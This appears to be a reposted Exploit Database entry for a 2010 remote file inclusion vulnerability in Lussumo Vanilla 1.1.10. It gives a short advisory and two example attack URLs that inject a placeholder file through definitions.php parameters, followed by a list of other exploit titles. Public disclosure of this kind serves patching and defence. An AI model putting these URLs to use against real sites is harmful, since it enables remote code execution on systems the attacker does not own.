Lussumo Vanilla 1.1.10 – ‘definitions.php’ Multiple Remote File Inclusions

Exploit Database
76 阅读

作者： eidelweiss

日期： 2010-03-23
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/33781/

source: https://www.securityfocus.com/bid/38889/info

Vanilla is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues may allow an attacker to compromise the application and the computer; other attacks are also possible.

Vanilla 1.1.10 and prior versions are vulnerable. 

http://www.example.com/PATH/languages/yourlanguage/definitions.php?include= [inj3ct0r]
http://www.example.com/PATH/languages/yourlanguage/definitions.php?Configuration['LANGUAGE']= [inj3ct0r]

last Exploits
Lussumo Vanilla 1.1.10 – ‘definitions.php’ Multiple Remote File Inclusions的更多信息

Radisys MRF – Command Injection：
IPFire 2.19 – Remote Code Execution：
WordPress Plugin TablePress 1.14 – CSV Injection：
Xoops 2.5.4 – Blind SQL Injection：
Collabtive 0.65 – Multiple Vulnerabilities：
SonicWALL GMS/Viewpoint/Analyzer – Authentication Bypass：
OpenKM 5.1.7 – Cross-Site Request Forgery：
WonderCMS 3.1.3 – ‘Menu’ Persistent Cross-Site Scripting：